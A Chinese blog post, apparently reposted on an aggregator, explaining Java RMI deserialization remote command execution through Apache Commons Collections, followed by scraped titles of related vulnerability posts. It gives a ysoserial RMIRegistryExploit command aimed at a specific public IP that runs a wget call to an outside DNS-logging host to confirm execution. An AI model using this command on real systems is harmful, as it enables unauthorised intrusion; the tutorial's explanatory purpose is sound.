2. 程式人生 > >Java RMI服務遠端命令執行利用

Java RMI服務遠端命令執行利用

阿新 發佈:2019-01-25

--------------------------------------------------------------

很長時間沒更新部落格了,今天來一發。

--------------------------------------------------------------

0x00 介紹 Java RMI服務是遠端方法呼叫(Remote Method Invocation)。它是一種機制,能夠讓在某個java虛擬機器上的物件呼叫另一個Java虛擬機器的物件的方法。 在Java Web中,很多地方都會用到RMI來相互呼叫。比如很多大型組織都會在後臺部署一些Java應用,用於對外網站釋出更新的靜態頁面,而這種釋出命令的下達使用的就是這種RMI形式。 值得注意的是,RMI傳輸過程必然會使用序列化和反序列化,如果RMI服務端埠對外開發,並且服務端使用了像Apache Commons Collections這種庫,那麼會導致遠端命令執行。 首先來看利用。 0x01 漏洞利用
 可以看到還是有很多案例的,這裡提取一個案例來演示: 場景:182.92.214.221伺服器開放了1099埠(RMI服務的預設開放埠),且暴露在公網中,並且恰好使用了Apache Commons Collections的缺陷版本,我們需要在這臺伺服器上執行命令。 工具: (1)ysoserial-0.0.3-all.jar 下載地址https://github.com/frohoff/ysoserial (2)java環境 執行命令時,為了驗證是否真正成功,我使用cloudeye來驗證: 上面的url是我的cloudeye的地址(打碼了)。 執行: 
java -cp ysoserial-0.0.3-all.jar ysoserial.exploit.RMIRegistryExploit 43.224.227.176 1099  CommonsCollections1 "wget http://ddabcc.dnslog.info?hello"

雖然看到丟擲異常了,但是我們的命令已經執行了,檢視cloudeye:



0x02 簡單的分析 注意到漏洞利用中的命令列裡出現了ysoserial.exploit.RMIRegistryExploit,我就手賤去看了一下原始碼,exp的邏輯很清晰,我加了些批註,如下圖:

相關推薦

Java RMI服務遠端命令執行利用

-------------------------------------------------------------- 很長時間沒更新部落格了,今天來一發。 -------------------------------------------------------

java實現 連線遠端伺服器 執行Linux命令 並獲取 執行返回的結果

情景:要通過java連線伺服器,並執行指令碼命令 得到 返回的結果 package com.ideal.openapi.util; import com.jcraft.jsch.*; import org.slf4j.Logger; import org.slf4j.LoggerFacto

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠端命令執行漏洞利用(GetShell)(轉載)

ThinkPHP官方2018年12月9日釋出重要的安全更新,修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒有進行足夠的檢測會導致在沒有開啟強制路由的情況下可能的getshell漏洞,受影響的版本包括5.0和5.1版本,推薦儘快更新到最新版本。 漏洞分析 Thin

python 利用pexpect進行多機遠端命令執行

#ssh_cmd.py #coding:utf-8 import pexpect def ssh_cmd(ip, user, passwd, cmd):     ssh = pexpect.spawn('ssh %[email protected]%s "%s"' % (user, ip, cmd)

java中使用JSCH包,SFTP及SSH2檔案操作及遠端命令執行

SFTPConstants.java,定義我們需要使用的一些引數名稱: public class SFTPConstants { public static final String SFTP_REQ_HOST = "host"; public static

WebLogic Server再曝高風險遠端命令執行0day漏洞,阿里雲WAF支援免費應急服務

6月11日,阿里雲安全團隊發現WebLogic CVE-2019-2725補丁繞過的0day漏洞,並第一時間上報Oracle官方,

smb(ms17-010)遠端命令執行之msf

1.本次用到的環境: kali(2016.2)32位系統.ip地址:192.168.1.104 目標靶機為:win7sp1x64系統(關閉防火牆),ip地址:192.168.1.105 具體的步驟如下: kali系統下安裝wine32: apt-get install wine32 &

驗證php的遠端命令執行漏洞案例

比如驗證JBoss EJBInvokerServlet Marshalled Object RCE(CVE-2013-4810 ) 0x01:首先我們開啟php的環境,如phpStudy,wamp等等,這裡我們就使用phpStudy吧,進入php-5.5.38的目錄(當前使用的這個php版本

Drupal 遠端命令執行漏洞(CVE-2018-7600)

名稱: Drupal 遠端命令執行漏洞 CVE-ID: CVE-2018-7600 Poc: https://paper.seebug.org/578/ EXPLOIT-DB: https://www.exploit-db.com/exploits/44448/ 平臺: PHP 漏洞描述:

【漏洞復現】ThinkPHP5 5.x 遠端命令執行(getshell)

0x00復現環境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠端命令執行漏洞利用(GetShell) 0x01步驟 點選start to hack 進入環境頁面 run the project 然後訪問給出的target address1.執行系統命令顯示目錄下檔案

GoAhead Web伺服器遠端命令執行漏洞(CVE-2017-17562)漏洞復現

一、漏洞概述: 1、漏洞簡介: GoAhead Web Server,它是一個開源(商業許可)、簡單、輕巧、功能強大、可以在多個平臺執行的嵌入式Web Server。 GoAhead Web Server是跨平臺的伺服器軟體,可以穩定地執行在Windows,Linux和

富士施樂 DocuCentre-V 3065 印表機遠端命令執行漏洞

直接上程式碼: Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution Date: 2018-09-05 Exploit Author: vr_system

漏洞預警 | ThinkPHP 5.x遠端命令執行漏洞

ThinkPHP採用面向物件的開發結構和MVC模式,融合了Struts的思想和TagLib(標籤庫)、RoR的ORM對映和ActiveRecord模式,是一款相容性高、部署簡單的輕量級國產PHP開發框架。 近日,ThinkPHP團隊釋出了版本更新資訊,修復一個遠端程式碼執行漏洞。該漏洞是由於框架對控制器名沒

ThinkPHP 5.x 遠端命令執行漏洞復現(GetShell)

注:轉載請註明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、簡介 ThinkPHP官方2018年12月9日釋出重要的安全更新,修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒

ThinkPHP5框架缺陷導致遠端命令執行(POC整合帖)

摘要 近日thinkphp團隊釋出了版本更新https://blog.thinkphp.cn/869075 ,其中修復了一處getshell漏洞。 影響範圍 5.x < 5.1.31<= 5.0.23 危害 遠端程式碼執行 漏洞分析 以下漏洞分析源於鬥魚SRC公眾號:鬥魚安全應急響應

ThinkPHP 遠端命令執行漏洞復現(GetShell)

漏洞概況 ThinkPHP是一款國內流行的開源PHP框架,近日被爆出存在可能的遠端程式碼執行漏洞,攻擊者可向快取檔案內寫入PHP程式碼,導致遠端程式碼執行。雖然該漏洞利用需要有幾個前提條件,但鑑於國內使用ThinkPHP框架的站點數量之多,該漏洞還是存在一定的影響範圍。由於框架對控制器名沒有

Windows遠端命令執行0day漏洞的安全預警及其處理建議

4月14日晚,一個叫Shadow Brokers的黑客組織洩露了一大波Windows的遠端漏洞利用工具,事件細節可以參照運維派前面的文章《Windows血崩,一波大規模 0day 攻擊洩漏》。 由於本次事件影響面廣且嚴重,一些IT廠商(包括事件的主角:微軟)都在第一時間給了緊急解決方案,供大家參考:

Windows系統SMB RDP遠端命令執行漏洞風險預警

一、風險預警 最近多個雲端計算供應商收到安全協助請求,經調查,都是因為未及時升級Windows系統SMB/RDP遠端命令執行漏洞補丁同時135/137/139/445埠開放到網際網路,進而導致主機被入侵,對業務造成影響。 微軟已釋出補丁,但大量租戶還未打補丁,存在很大安全風險,我們強烈建議收到預警通

URI Scheme註冊偽協議實現遠端命令執行

Windows配置登錄檔註冊偽協議 1、新建偽協議項 WIN+R 輸入regedit 開啟登錄檔,在登錄檔HKEY_CLASSES_ROOT鍵中新建一個項,項的名字就是你偽協議的名字,例如我註冊一個cmd協議。 然後不用管預設字串值,新建一個叫URL Procotol的字串值,值為空即可。

ThinkPHP遠端命令執行漏洞原理及復現

2018年12月11日,exploit-db更新了一個thinkphp框架遠端程式碼執行漏洞exploit地址:https://www.exploit-db.com/exploits/45978由於框架對控制器名沒有進行足夠的檢測導致在沒有開啟強制路由的情況下getshell漏洞影響範圍Thinkphp 5.